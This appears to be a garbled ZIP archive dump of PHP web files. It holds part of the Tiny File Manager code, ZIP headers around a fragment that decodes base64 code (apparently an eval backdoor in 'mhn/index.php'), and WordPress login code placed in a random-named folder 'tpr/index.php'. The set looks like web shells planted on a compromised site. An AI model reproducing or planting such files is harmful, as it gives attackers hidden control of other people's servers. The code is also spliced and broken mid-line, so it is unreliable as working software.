$cmd = ($iswin) ? "for %F in (\"$file\") do @echo %~zF" : ($isdarwin ? "stat -f%z $arg" : "stat -c%s $arg"); @exec($cmd, $output); if (is_array($output) && ctype_digit($size = trim(implode("\n", $output)))) { return $size; } } // try the Windows COM interface if ($iswin && class_exists("COM")) { try { $fsobj = new COM('Scripting.FileSystemObject'); $f = $fsobj->GetFile( realpath($file) ); $size = $f->Size; } catch (Exception $e) { $size = null; } if (ctype_digit($size)) { return $size; } } // if all else fails return filesize($file); } /** * Get nice filesize * @param int $size * @return string */ function fm_get_filesize($size) { $size = (float) $size; $units = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB'); $power = $size > 0 ? floor(log($size, 1024)) : 0; return sprintf('%s %s', round($size / pow(1024, $power), 2), $units[$power]); } /** * Get director total size * @param string $directory * @return int */ function fm_get_directorysize($directory) { global $calc_folder; if ($calc_folder==true) { // Slower output $size = 0; $count= 0; $dirCount= 0; foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory)) as $file) if ($file->isFile()) { $size+=$file->getSize(); $count++; } else if ($file->isDir()) { $dirCount++; } // return [$size, $count, $dirCount]; return $size; } else return 'Folder'; // Quick output } /** * Get info about zip archive * @param string $path * @return array|bool */ function fm_get_zif_info($path, $ext) { if ($ext == 'zip' && function_exists('zip_open')) { $arch = zip_open($path); if ($arch) { $filenames = array(); while ($zip_entry = zip_read($arch)) { $zip_name = zip_entry_name($zip_entry); $zip_folder = substr($zip_name, -1) == '/'; $filenames[] = array( 'name' => $zip_name, 'filesize' => zip_entry_filesize($zip_entry), 'compressed_size' => zip_entry_compressedsize($zip_entry), 'folder' => $zip_folder //'compression_method' => zip_entry_compressionmethod($zip_entry), ); } zip_close($arch); return $filenames; } } elseif($ext == 'tar' && class_exists('PharData')) { $archive = new PharData($path); $filenames = array(); foreach(new RecursiveIteratorIterator($archive) as $file) { $parent_info = $file->getPathInfo(); $zip_name = str_replace("phar://".$path, '', $file->getPathName()); $zip_name = substr($zip_name, ($pos = strpos($zip_name, '/')) !== false ? $pos + 1 : 0); $zip_folder = $parent_info->getFileName(); $zip_info = new SplFileInfo($file); $filenames[] = array( 'name' => $zip_name, 'filesize' => $zip_info->getSize(), 'compressed_size' => $file->getCompressedSize(), 'folder' => $zip_folder ); } return $filenames; } return false; } /** * Encode html entities * @param string $text * @return string */ function fm_enc($text) { return htmlspecialchars($text, ENT_QUOTES, 'UTF-8'); } /** * Prevent XSS attacks * @param string $text * @return string */ function fm_isvalid_filename($text) { return (strpbrk($text, '/?%*:|"<>') === FALSE) ? true : false; } /** * Save message in session * @param string $msg * @param string $status */ function fm_set_msg($msg, $status = 'ok') { $_SESSION[FM_SESSION_ID]['message'] = $msg; $_SESSION[FM_SESSION_ID]['status'] = $status; } /** * Check if string is in UTF-8 * @param string $string * @return int */ function fm_is_utf8($string) { return preg_match('//u', $string); } /** * Convert file name to UTF-8 in Windows * @param string $filename * @return string */ function fm_convert_win($filename) { if (FM_IS_WIN && function_exists('iconv')) { $filename = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $filename); } return $filename; } /** * @param $obj * @return array */ function fm_object_to_array($obj) { if (!is_object($obj) && !is_array($obj)) { return $obj; } if (is_object($obj)) { $obj = get_object_vars($obj); } return array_map('fm_object_to_array', $obj); } /** * Get CSS classname for file * @param string $path * @return string */ function fm_get_file_icon_class($path) { // get extension $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); switch ($ext) { case 'ico': case 'gif': case 'jpg': case 'jpeg': case 'jpc': case 'jp2': case 'jpx': case 'xbm': case 'wbmp': case 'png': case 'bmp': case 'tif': case 'tiff': case 'webp': case 'avif': case 'svg': $img = 'fa fa-picture-o'; break; case 'passwd': case 'ftpquota': case 'sql': case 'js': case 'json': case 'sh': case 'config': case 'twig': case 'tpl': case 'md': case 'gitignore': case 'c': case 'cpp': case 'cs': case 'py': case 'rs': case 'map': case 'lock': case 'dtd': $img = 'fa fa-file-code-o'; break; case 'txt': case 'ini': case 'conf': case 'log': case 'htaccess': $img = 'fa fa-file-text-o'; break; case 'css': case 'less': case 'sass': case 'scss': $img = 'fa fa-css3'; break; case 'bz2': case 'zip': case 'rar': case 'gz': case 'tar': case '7z': case 'xz': $img = 'fa fa-file-archive-o'; break; case 'php': case 'php4': case 'php5': case 'phps': case 'phtml': $img = 'fa fa-code'; break; case 'htm': case 'html': case 'shtml': case 'xhtml': $img = 'fa fa-html5'; break; case 'xml': case 'xsl': $img = 'fa fa-file-excel-o'; break; case 'wav': case 'mp3': case 'mp2': case 'm4a': case 'aac': case 'ogg': case 'oga': case 'wma': case 'mka': case 'flac': case 'ac3': case 'tds': $img = 'fa fa-music'; break; case 'm3u': case 'm3u8': case 'pls': case 'cue': case 'xspf': $img = 'fa fa-headphones'; break; case 'avi': case 'mpg': case 'mpeg': case 'mp4': case 'm4v': case 'flv': case 'f4v': case 'ogm': case 'ogv': case 'mov': case 'mkv': case '3gp': case 'asf': case 'wmv': $img = 'fa fa-file-video-o'; break; case 'eml': case 'msg': $img = 'fa fa-envelope-o'; break; case 'xls': case 'xlsx': case 'ods': $img = 'fa fa-file-excel-o'; break; case 'csv': $img = 'fa fa-file-text-o'; break; case 'bak': case 'swp': $img = 'fa fa-clipboard'; break; case 'doc': case 'docx': case 'odt': $img = 'fa fa-file-word-o'; break; case 'ppt': case 'pptx': $img = 'fa fa-file-powerpoint-o'; break; case 'ttf': case 'ttc': case 'otf': case 'woff': case 'woff2': case 'eot': case 'fon': $img = 'fa fa-font'; break; case 'pdf': $img = 'fa fa-file-pdf-o'; break; case 'psd': case 'ai': case 'eps': case 'fla': case 'swf': $img = 'fa fa-file-image-o'; break; case 'exe': case 'msi': $img = 'fa fa-file-o'; break; case 'bat': $img = 'fa fa-terminal'; break; default: $img = 'fa fa-info-circle'; } return $img; } /** * Get image files extensions * @return array */ function fm_get_image_exts() { return array('ico', 'gif', 'jpg', 'jpeg', 'jpc', 'jp2', 'jpx', 'xbm', 'wbmp', 'png', 'bmp', 'tif', 'tiff', 'psd', 'svg', 'webp', 'avif'); } /** * Get video files extensions * @return array */ function fm_get_video_exts() { return array('avi', 'webm', 'wmv', 'mp4', 'm4v', 'ogm', 'ogv', 'mov', 'mkv'); } /** * Get audio files extensions * @return array */ function fm_get_audio_exts() { return array('wav', 'mp3', 'ogg', 'm4a'); } /** * Get text file extensions * @return array */ function fm_get_text_exts() { return array( 'txt', 'css', 'ini', 'conf', 'log', 'htaccess', 'passwd', 'ftpquota', 'sql', 'js', 'json', 'sh', 'config', 'php', 'php4', 'php5', 'phps', 'phtml', 'htm', 'html', 'shtml', 'xhtml', 'xml', 'xsl', 'm3u', 'm3u8', 'pls', 'cue', 'eml', 'msg', 'csv', 'bat', 'twig', 'tpl', 'md', 'gitignore', 'less', 'sass', 'scss', 'c', 'cpp', 'cs', 'py', 'map', 'lock', 'dtd', 'svg', 'scss', 'asp', 'aspx', 'asx', 'asmx', 'ashx', 'jsx', 'jsp', 'jspx', 'cfm', 'cgi' ); } /** * Get mime types of text files * @return array */ function fm_get_text_mimes() { return array( 'application/xml', 'application/javascript', 'application/x-javascript', 'image/svg+xml', 'message/rfc822', ); } /** * Get file names of text files w/o extensions * @return array */ function fm_get_text_names() { return array( 'license', 'readme', 'authors', 'contributors', 'changelog', ); } /** * Get online docs viewer supported files extensions * @return array */ function fm_get_onlineViewer_exts() { return array('doc', 'docx', 'xls', 'xlsx', 'pdf', 'ppt', 'pptx', 'ai', 'psd', 'dxf', 'xps', 'rar', 'odt', 'ods'); } function fm_get_file_mimes($extension) { $fileTypes['swf'] = 'application/x-shockwave-flash'; $fileTypes['pdf'] = 'application/pdf'; $fileTypes['exe'] = 'application/octet-stream'; $fileTypes['zip'] = 'application/zip'; $fileTypes['doc'] = 'application/msword'; $fileTypes['xls'] = 'application/vnd.ms-excel'; $fileTypes['ppt'] = 'application/vnd.ms-powerpoint'; $fileTypes['gif'] = 'image/gif'; $fileTypes['png'] = 'image/png'; $fileTypes['jpeg'] = 'image/jpg'; $fileTypes['jpg'] = 'image/jpg'; $fileTypes['webp'] = 'image/webp'; $fileTypes['avif'] = 'image/avif'; $fileTypes['rar'] = 'application/rar'; $fileTypes['ra'] = 'audio/x-pn-realaudio'; $fileTypes['ram'] = 'audio/x-pn-realaudio'; $fileTypes['ogg'] = 'audio/x-pn-realaudio'; $fileTypes['wav'] = 'video/x-msvideo'; $fileTypes['wmv'] = 'video/x-msvideo'; $fileTypes['avi'] = 'video/x-msvideo'; $fileTypes['asf'] = 'video/x-msvideo'; $fileTypes['divx'] = 'video/x-msvideo'; $fileTypes['mp3'] = 'audio/mpeg'; $fileTypes['mp4'] = 'audio/mpeg'; $fileTypes['mpeg'] = 'video/mpeg'; $fileTypes['mpg'] = 'video/mpeg'; $fileTypes['mpe'] = 'video/mpeg'; $fileTypes['mov'] = 'video/quicktime'; $fileTypes['swf'] = 'video/quicktime'; $fileTypes['3gp'] = 'video/quicktime'; $fileTypes['m4a'] = 'video/quicktime'; $fileTypes['aac'] = 'video/quicktime'; $fileTypes['m3u'] = 'video/quicktime'; $fileTypes['php'] = ['application/x-php']; $fileTypes['html'] = ['text/html']; $fileTypes['txt'] = ['text/plain']; //Unknown mime-types should be 'application/octet-stream' if(empty($fileTypes[$extension])) { $fileTypes[$extension] = ['application/octet-stream']; } return $fileTypes[$extension]; } /** * This function scans the files and folder recursively, and return matching files * @param string $dir * @param string $filter * @return json */ function scan($dir, $filter = '') { $path = FM_ROOT_PATH.'/'.$dir; if($dir) { $ite = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path)); $rii = new RegexIterator($ite, "/(" . $filter . ")/i"); $files = array(); foreach ($rii as $file) { if (!$file->isDir()) { $fileName = $file->getFilename(); $location = str_replace(FM_ROOT_PATH, '', $file->getPath()); $files[] = array( "name" => $fileName, "type" => "file", "path" => $location, ); } } return $files; } } /* Parameters: downloadFile(File Location, File Name, max speed, is streaming If streaming - videos will show as videos, images as images instead of download prompt https://stackoverflow.com/a/13821992/1164642 */ function fm_download_file($fileLocation, $fileName, $chunkSize = 1024) { if (connection_status() != 0) return (false); $extension = pathinfo($fileName, PATHINFO_EXTENSION); $contentType = fm_get_file_mimes($extension); header("Cache-Control: public"); header("Content-Transfer-Encoding: binary\n"); header('Content-Type: $contentType'); $contentDisposition = 'attachment'; if (strstr($_SERVER['HTTP_USER_AGENT'], "MSIE")) { $fileName = preg_replace('/\./', '%2e', $fileName, substr_count($fileName, '.') - 1); header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } else { header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } header("Accept-Ranges: bytes"); $range = 0; $size = filesize($fileLocation); if (isset($_SERVER['HTTP_RANGE'])) { list($a, $range) = explode("=", $_SERVER['HTTP_RANGE']); str_replace($range, "-", $range); $size2 = $size - 1; $new_length = $size - $range; header("HTTP/1.1 206 Partial Content"); header("Content-Length: $new_length"); header("Content-Range: bytes $range$size2/$size"); } else { $size2 = $size - 1; header("Content-Range: bytes 0-$size2/$size"); header("Content-Length: " . $size); } if ($size == 0) { die('Zero byte file! Aborting download'); } @ini_set('magic_quotes_runtime', 0); $fp = fopen("$fileLocation", "rb"); fseek($fp, $range); while (!feof($fp) and (connection_status() == 0)) { set_time_limit(0); print(@fread($fp, 1024*$chunkSize)); flush(); ob_flush(); // sleep(1); } fclose($fp); return ((connection_status() == 0) and !connection_aborted()); } function fm_get_theme() { $result = ''; if(FM_THEME == "dark") { $result = "text-white bg-dark"; } return $result; } /** * Class to work with zip files (using ZipArchive) */ class FM_Zipper { private $zip; public function __construct() { $this->zip = new ZipArchive(); } /** * Create archive with name $filename and files $files (RELATIVE PATHS!) * @param string $filename * @param array|string $files * @return bool */ public function create($filename, $files) { $res = $this->zip->open($filename, ZipArchive::CREATE); if ($res !== true) { return false; } if (is_array($files)) { foreach ($files as $f) { if (!$this->addFileOrDir($f)) { $this->zip->close(); return false; } } $this->zip->close(); return true; } else { if ($this->addFileOrDir($files)) { $this->zip->close(); return true; } return false; } } /** * Extract archive $filename to folder $path (RELATIVE OR ABSOLUTE PATHS) * @param string $filename * @param string $path * @return bool */ public function unzip($filename, $path) { $res = $this->zip->open($filename); if ($res !== true) { return false; } if ($this->zip->extractTo($path)) { $this->zip->close(); return true; } return false; } /** * Add file/folder to archive * @param string $filename * @return bool */ private function addFileOrDir($filename) { if (is_file($filename)) { return $this->zip->addFile($filename); } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } /** * Add folder recursively * @param string $path * @return bool */ private function addDir($path) { if (!$this->zip->addEmptyDir($path)) { return false; } $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' && $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { if (!$this->zip->addFile($path . '/' . $file)) { return false; } } } } return true; } return false; } } /** * Class to work with Tar files (using PharData) */ class FM_Zipper_Tar { private $tar; public function __construct() { $this->tar = null; } /** * Create archive with name $filename and files $files (RELATIVE PATHS!) * @param string $filename * @param array|string $files * @return bool */ public function create($filename, $files) { $this->tar = new PharData($filename); if (is_array($files)) { foreach ($files as $f) { if (!$this->addFileOrDir($f)) { return false; } } return true; } else { if ($this->addFileOrDir($files)) { return true; } return false; } } /** * Extract archive $filename to folder $path (RELATIVE OR ABSOLUTE PATHS) * @param string $filename * @param string $path * @return bool */ public function unzip($filename, $path) { $res = $this->tar->open($filename); if ($res !== true) { return false; } if ($this->tar->extractTo($path)) { return true; } return false; } /** * Add file/folder to archive * @param string $filename * @return bool */ private function addFileOrDir($filename) { if (is_file($filename)) { try { $this->tar->addFile($filename); return true; } catch (Exception $e) { return false; } } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } /** * Add folder recursively * @param string $path * @return bool */ private function addDir($path) { $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' && $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { try { $this->tar->addFile($path . '/' . $file); } catch (Exception $e) { return false; } } } } return true; } return false; } } /** * Save Configuration */ class FM_Config { var $data; function __construct() { global $root_path, $root_url, $CONFIG; $fm_url = $root_url.$_SERVER["PHP_SELF"]; $this->data = array( 'lang' => 'en', 'error_reporting' => true, 'show_hidden' => true ); $data = false; if (strlen($CONFIG)) { $data = fm_object_to_array(json_decode($CONFIG)); } else { $msg = 'Tiny File Manager
Error: Cannot load configuration'; if (substr($fm_url, -1) == '/') { $fm_url = rtrim($fm_url, '/'); $msg .= '
'; $msg .= '
Seems like you have a trailing slash on the URL.'; $msg .= '
Try this link: ' . $fm_url . ''; } die($msg); } if (is_array($data) && count($data)) $this->data = $data; else $this->save(); } function save() { $fm_file = __FILE__; $var_name = '$CONFIG'; $var_value = var_export(json_encode($this->data), true); $config_string = " ' . $_SESSION[FM_SESSION_ID]['message'] . '

'; unset($_SESSION[FM_SESSION_ID]['message']); unset($_SESSION[FM_SESSION_ID]['status']); } } /** * Show page header in Login Form */ function fm_show_header_login() { $sprites_ver = '20160315'; header("Content-Type: text/html; charset=utf-8"); header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0"); header("Pragma: no-cache"); global $lang, $root_url, $favicon_path; ?> '; } ?> <?php echo fm_enc(APP_TITLE) ?> ">
'; } ?> <?php echo fm_enc(APP_TITLE) ?> ">
PK>5\| mhn/index.phpnuW+A' . base64_decode($code)); } ?>PK@5\?K tpr/index.phpnuW+A` element. * Default 'Log In'. * @param string $message Optional. Message to display in header. Default empty. * @param WP_Error $wp_error Optional. The error to pass. Default is a WP_Error instance. */ function login_header( $title = 'Log In', $message = '', $wp_error = null ) { global $error, $interim_login, $action; // Don't index any of these forms. add_filter( 'wp_robots', 'wp_robots_sensitive_page' ); add_action( 'login_head', 'wp_strict_cross_origin_referrer' ); add_action( 'login_head', 'wp_login_viewport_meta' ); if ( ! is_wp_error( $wp_error ) ) { $wp_error = new WP_Error(); } // Shake it! $shake_error_codes = array( 'empty_password', 'empty_email', 'invalid_email', 'invalidcombo', 'empty_username', 'invalid_username', 'incorrect_password', 'retrieve_password_email_failure' ); /** * Filters the error codes array for shaking the login form. * * @since 3.0.0 * * @param array $shake_error_codes Error codes that shake the login form. */ $shake_error_codes = apply_filters( 'shake_error_codes', $shake_error_codes ); if ( $shake_error_codes && $wp_error->has_errors() && in_array( $wp_error->get_error_code(), $shake_error_codes, true ) ) { add_action( 'login_footer', 'wp_shake_js', 12 ); } $login_title = get_bloginfo( 'name', 'display' ); /* translators: Login screen title. 1: Login screen name, 2: Network or site name. */ $login_title = sprintf( __( '%1$s ‹ %2$s — WordPress' ), $title, $login_title ); if ( wp_is_recovery_mode() ) { /* translators: %s: Login screen title. */ $login_title = sprintf( __( 'Recovery Mode — %s' ), $login_title ); } /** * Filters the title tag content for login page. * * @since 4.9.0 * * @param string $login_title The page title, with extra context added. * @param string $title The original page title. */ $login_title = apply_filters( 'login_title', $login_title, $title ); ?> > <?php echo $login_title; ?> get_error_code() ) { ?>

add( 'error', $error ); unset( $error ); } if ( $wp_error->has_errors() ) { $errors = ''; $messages = ''; foreach ( $wp_error->get_error_codes() as $code ) { $severity = $wp_error->get_error_data( $code ); foreach ( $wp_error->get_error_messages( $code ) as $error_message ) { if ( 'message' === $severity ) { $messages .= ' ' . $error_message . "
\n"; } else { $errors .= ' ' . $error_message . "
\n"; } } } if ( ! empty( $errors ) ) { /** * Filters the error messages displayed above the login form. * * @since 2.1.0 * * @param string $errors Login error message. */ echo '
' . apply_filters( 'login_errors', $errors ) . "
\n"; } if ( ! empty( $messages ) ) { /** * Filters instructional messages displayed above the login form. * * @since 2.5.0 * * @param string $messages Login messages. */ echo '

' . apply_filters( 'login_messages', $messages ) . "

\n"; } } } // End of login_header(). /** * Outputs the footer for the login page. * * @since 3.1.0 * * @global bool|string $interim_login Whether interim login modal is being displayed. String 'success' * upon successful login. * * @param string $input_id Which input to auto-focus. */ function login_footer( $input_id = '' ) { global $interim_login; // Don't allow interim logins to navigate away from the page. if ( ! $interim_login ) { ?>

%s', esc_url( home_url( '/' ) ), sprintf( /* translators: %s: Site title. */ _x( '← Go to %s', 'site' ), get_bloginfo( 'title', 'display' ) ) ); /** * Filter the "Go to site" link displayed in the login page footer. * * @since 5.7.0 * * @param string $link HTML link to the home URL of the current site. */ echo apply_filters( 'login_site_html_link', $html_link ); ?>

', '
' ); } ?> . ?>
0 ) { update_option( 'admin_email_lifespan', time() + $remind_interval ); } $redirect_to = add_query_arg( 'admin_email_remind_later', 1, $redirect_to ); wp_safe_redirect( $redirect_to ); exit; } if ( ! empty( $_POST['correct-admin-email'] ) ) { if ( ! check_admin_referer( 'confirm_admin_email', 'confirm_admin_email_nonce' ) ) { wp_safe_redirect( wp_login_url() ); exit; } /** * Filters the interval for redirecting the user to the admin email confirmation screen. * * If `0` (zero) is returned, the user will not be redirected. * * @since 5.3.0 * * @param int $interval Interval time (in seconds). Default is 6 months. */ $admin_email_check_interval = (int) apply_filters( 'admin_email_check_interval', 6 * MONTH_IN_SECONDS ); if ( $admin_email_check_interval > 0 ) { update_option( 'admin_email_lifespan', time() + $admin_email_check_interval ); } wp_safe_redirect( $redirect_to ); exit; } login_header( __( 'Confirm your administration email' ), '', $errors ); /** * Fires before the admin email confirm form. * * @since 5.3.0 * * @param WP_Error $errors A `WP_Error` object containing any errors generated by using invalid * credentials. Note that the error object may not contain any errors. */ do_action( 'admin_email_confirm', $errors ); ?>

administration email for this website is still correct.' ); ?> %s', __( '(opens in a new tab)' ) ); printf( '%s%s', esc_url( $admin_email_help_url ), __( 'Why is this important?' ), $accessibility_text ); ?>

' . esc_html( $admin_email ) . '' ); ?>

0 ) : ?>
'confirm_admin_email', 'remind_me_later' => wp_create_nonce( 'remind_me_later_nonce' ), ), $remind_me_link ); ?>
HashPassword( wp_unslash( $_POST['post_password'] ) ), $expire, COOKIEPATH, COOKIE_DOMAIN, $secure ); wp_safe_redirect( wp_get_referer() ); exit; case 'logout': check_admin_referer( 'log-out' ); $user = wp_get_current_user(); wp_logout(); if ( ! empty( $_REQUEST['redirect_to'] ) ) { $redirect_to = $_REQUEST['redirect_to']; $requested_redirect_to = $redirect_to; } else { $redirect_to = add_query_arg( array( 'loggedout' => 'true', 'wp_lang' => get_user_locale( $user ), ), wp_login_url() ); $requested_redirect_to = ''; } /** * Filters the log out redirect URL. * * @since 4.2.0 * * @param string $redirect_to The redirect destination URL. * @param string $requested_redirect_to The requested redirect destination URL passed as a parameter. * @param WP_User $user The WP_User object for the user that's logging out. */ $redirect_to = apply_filters( 'logout_redirect', $redirect_to, $requested_redirect_to, $user ); wp_safe_redirect( $redirect_to ); exit; case 'lostpassword': case 'retrievepassword': if ( $http_post ) { $errors = retrieve_password(); if ( ! is_wp_error( $errors ) ) { $redirect_to = ! empty( $_REQUEST['redirect_to'] ) ? $_REQUEST['redirect_to'] : 'wp-login.php?checkemail=confirm'; wp_safe_redirect( $redirect_to ); exit; } } if ( isset( $_GET['error'] ) ) { if ( 'invalidkey' === $_GET['error'] ) { $errors->add( 'invalidkey', __( 'Error: Your password reset link appears to be invalid. Please request a new link below.' ) ); } elseif ( 'expiredkey' === $_GET['error'] ) { $errors->add( 'expiredkey', __( 'Error: Your password reset link has expired. Please request a new link below.' ) ); } } $lostpassword_redirect = ! empty( $_REQUEST['redirect_to'] ) ? $_REQUEST['redirect_to'] : ''; /** * Filters the URL redirected to after submitting the lostpassword/retrievepassword form. * * @since 3.0.0 * * @param string $lostpassword_redirect The redirect destination URL. */ $redirect_to = apply_filters( 'lostpassword_redirect', $lostpassword_redirect ); /** * Fires before the lost password form. * * @since 1.5.1 * @since 5.1.0 Added the `$errors` parameter. * * @param WP_Error $errors A `WP_Error` object containing any errors generated by using invalid * credentials. Note that the error object may not contain any errors. */ do_action( 'lost_password', $errors ); login_header( __( 'Lost Password' ), '

' . __( 'Please enter your username or email address. You will receive an email message with instructions on how to reset your password.' ) . '

', $errors ); $user_login = ''; if ( isset( $_POST['user_login'] ) && is_string( $_POST['user_login'] ) ) { $user_login = wp_unslash( $_POST['user_login'] ); } ?>

get_error_code() === 'expired_key' ) { wp_redirect( site_url( 'wp-login.php?action=lostpassword&error=expiredkey' ) ); } else { wp_redirect( site_url( 'wp-login.php?action=lostpassword&error=invalidkey' ) ); } exit; } $errors = new WP_Error(); if ( isset( $_POST['pass1'] ) && $_POST['pass1'] !== $_POST['pass2'] ) { $errors->add( 'password_reset_mismatch', __( 'Error: The passwords do not match.' ) ); } /** * Fires before the password reset procedure is validated. * * @since 3.5.0 * * @param WP_Error $errors WP Error object. * @param WP_User|WP_Error $user WP_User object if the login and reset key match. WP_Error object otherwise. */ do_action( 'validate_password_reset', $errors, $user ); if ( ( ! $errors->has_errors() ) && isset( $_POST['pass1'] ) && ! empty( $_POST['pass1'] ) ) { reset_password( $user, $_POST['pass1'] ); setcookie( $rp_cookie, ' ', time() - YEAR_IN_SECONDS, $rp_path, COOKIE_DOMAIN, is_ssl(), true ); login_header( __( 'Password Reset' ), '

' . __( 'Your password has been reset.' ) . ' ' . __( 'Log in' ) . '

' ); login_footer(); exit; } wp_enqueue_script( 'utils' ); wp_enqueue_script( 'user-profile' ); login_header( __( 'Reset Password' ), '

' . __( 'Enter your new password below or generate one.' ) . '

', $errors ); ?>


' . __( 'Register For This Site' ) . '

', $errors ); ?>


add( 'confirm', sprintf( /* translators: %s: Link to the login page. */ __( 'Check your email for the confirmation link, then visit the login page.' ), wp_login_url() ), 'message' ); } elseif ( 'registered' === $_GET['checkemail'] ) { $errors->add( 'registered', sprintf( /* translators: %s: Link to the login page. */ __( 'Registration complete. Please check your email, then visit the login page.' ), wp_login_url() ), 'message' ); } /** This action is documented in wp-login.php */ $errors = apply_filters( 'wp_login_errors', $errors, $redirect_to ); login_header( __( 'Check your email' ), '', $errors ); login_footer(); break; case 'confirmaction': if ( ! isset( $_GET['request_id'] ) ) { wp_die( __( 'Missing request ID.' ) ); } if ( ! isset( $_GET['confirm_key'] ) ) { wp_die( __( 'Missing confirm key.' ) ); } $request_id = (int) $_GET['request_id']; $key = sanitize_text_field( wp_unslash( $_GET['confirm_key'] ) ); $result = wp_validate_user_request_key( $request_id, $key ); if ( is_wp_error( $result ) ) { wp_die( $result ); } /** * Fires an action hook when the account action has been confirmed by the user. * * Using this you can assume the user has agreed to perform the action by * clicking on the link in the confirmation email. * * After firing this action hook the page will redirect to wp-login a callback * redirects or exits first. * * @since 4.9.6 * * @param int $request_id Request ID. */ do_action( 'user_request_action_confirmed', $request_id ); $message = _wp_privacy_account_request_confirmed_message( $request_id ); login_header( __( 'User action confirmed.' ), $message ); login_footer(); exit; case 'login': default: $secure_cookie = ''; $customize_login = isset( $_REQUEST['customize-login'] ); if ( $customize_login ) { wp_enqueue_script( 'customize-base' ); } // If the user wants SSL but the session is not SSL, force a secure cookie. if ( ! empty( $_POST['log'] ) && ! force_ssl_admin() ) { $user_name = sanitize_user( wp_unslash( $_POST['log'] ) ); $user = get_user_by( 'login', $user_name ); if ( ! $user && strpos( $user_name, '@' ) ) { $user = get_user_by( 'email', $user_name ); } if ( $user ) { if ( get_user_option( 'use_ssl', $user->ID ) ) { $secure_cookie = true; force_ssl_admin( true ); } } } if ( isset( $_REQUEST['redirect_to'] ) ) { $redirect_to = $_REQUEST['redirect_to']; // Redirect to HTTPS if user wants SSL. if ( $secure_cookie && false !== strpos( $redirect_to, 'wp-admin' ) ) { $redirect_to = preg_replace( '|^http://|', 'https://', $redirect_to ); } } else { $redirect_to = admin_url(); } $reauth = empty( $_REQUEST['reauth'] ) ? false : true; $user = wp_signon( array(), $secure_cookie ); if ( empty( $_COOKIE[ LOGGED_IN_COOKIE ] ) ) { if ( headers_sent() ) { $user = new WP_Error( 'test_cookie', sprintf( /* translators: 1: Browser cookie documentation URL, 2: Support forums URL. */ __( 'Error: Cookies are blocked due to unexpected output. For help, please see this documentation or try the support forums.' ), __( 'https://wordpress.org/support/article/cookies/' ), __( 'https://wordpress.org/support/forums/' ) ) ); } elseif ( isset( $_POST['testcookie'] ) && empty( $_COOKIE[ TEST_COOKIE ] ) ) { // If cookies are disabled, we can't log in even with a valid user and password. $user = new WP_Error( 'test_cookie', sprintf( /* translators: %s: Browser cookie documentation URL. */ __( 'Error: Cookies are blocked or not supported by your browser. You must enable cookies to use WordPress.' ), __( 'https://wordpress.org/support/article/cookies/#enable-cookies-in-your-browser' ) ) ); } } $requested_redirect_to = isset( $_REQUEST['redirect_to'] ) ? $_REQUEST['redirect_to'] : ''; /** * Filters the login redirect URL. * * @since 3.0.0 * * @param string $redirect_to The redirect destination URL. * @param string $requested_redirect_to The requested redirect destination URL passed as a parameter. * @param WP_User|WP_Error $user WP_User object if login was successful, WP_Error object otherwise. */ $redirect_to = apply_filters( 'login_redirect', $redirect_to, $requested_redirect_to, $user ); if ( ! is_wp_error( $user ) && ! $reauth ) { if ( $interim_login ) { $message = '

' . __( 'You have logged in successfully.' ) . '

'; $interim_login = 'success'; login_header( '', $message ); ?> exists() && $user->has_cap( 'manage_options' ) ) { $admin_email_lifespan = (int) get_option( 'admin_email_lifespan' ); // If `0` (or anything "falsey" as it is cast to int) is returned, the user will not be redirected // to the admin email confirmation screen. /** This filter is documented in wp-login.php */ $admin_email_check_interval = (int) apply_filters( 'admin_email_check_interval', 6 * MONTH_IN_SECONDS ); if ( $admin_email_check_interval > 0 && time() > $admin_email_lifespan ) { $redirect_to = add_query_arg( array( 'action' => 'confirm_admin_email', 'wp_lang' => get_user_locale( $user ), ), wp_login_url( $redirect_to ) ); } } if ( ( empty( $redirect_to ) || 'wp-admin/' === $redirect_to || admin_url() === $redirect_to ) ) { // If the user doesn't belong to a blog, send them to user admin. If the user can't edit posts, send them to their profile. if ( is_multisite() && ! get_active_blog_for_user( $user->ID ) && ! is_super_admin( $user->ID ) ) { $redirect_to = user_admin_url(); } elseif ( is_multisite() && ! $user->has_cap( 'read' ) ) { $redirect_to = get_dashboard_url( $user->ID ); } elseif ( ! $user->has_cap( 'edit_posts' ) ) { $redirect_to = $user->has_cap( 'read' ) ? admin_url( 'profile.php' ) : home_url(); } wp_redirect( $redirect_to ); exit; } wp_safe_redirect( $redirect_to ); exit; } $errors = $user; // Clear errors if loggedout is set. if ( ! empty( $_GET['loggedout'] ) || $reauth ) { $errors = new WP_Error(); } if ( empty( $_POST ) && $errors->get_error_codes() === array( 'empty_username', 'empty_password' ) ) { $errors = new WP_Error( '', '' ); } if ( $interim_login ) { if ( ! $errors->has_errors() ) { $errors->add( 'expired', __( 'Your session has expired. Please log in to continue where you left off.' ), 'message' ); } } else { // Some parts of this script use the main login form to display a message. if ( isset( $_GET['loggedout'] ) && $_GET['loggedout'] ) { $errors->add( 'loggedout', __( 'You are now logged out.' ), 'message' ); } elseif ( isset( $_GET['registration'] ) && 'disabled' === $_GET['registration'] ) { $errors->add( 'registerdisabled', __( 'Error: User registration is currently not allowed.' ) ); } elseif ( strpos( $redirect_to, 'about.php?updated' ) ) { $errors->add( 'updated', __( 'You have successfully updated WordPress! Please log back in to see what’s new.' ), 'message' ); } elseif ( WP_Recovery_Mode_Link_Service::LOGIN_ACTION_ENTERED === $action ) { $errors->add( 'enter_recovery_mode', __( 'Recovery Mode Initialized. Please log in to continue.' ), 'message' ); } elseif ( isset( $_GET['redirect_to'] ) && false !== strpos( $_GET['redirect_to'], 'wp-admin/authorize-application.php' ) ) { $query_component = wp_parse_url( $_GET['redirect_to'], 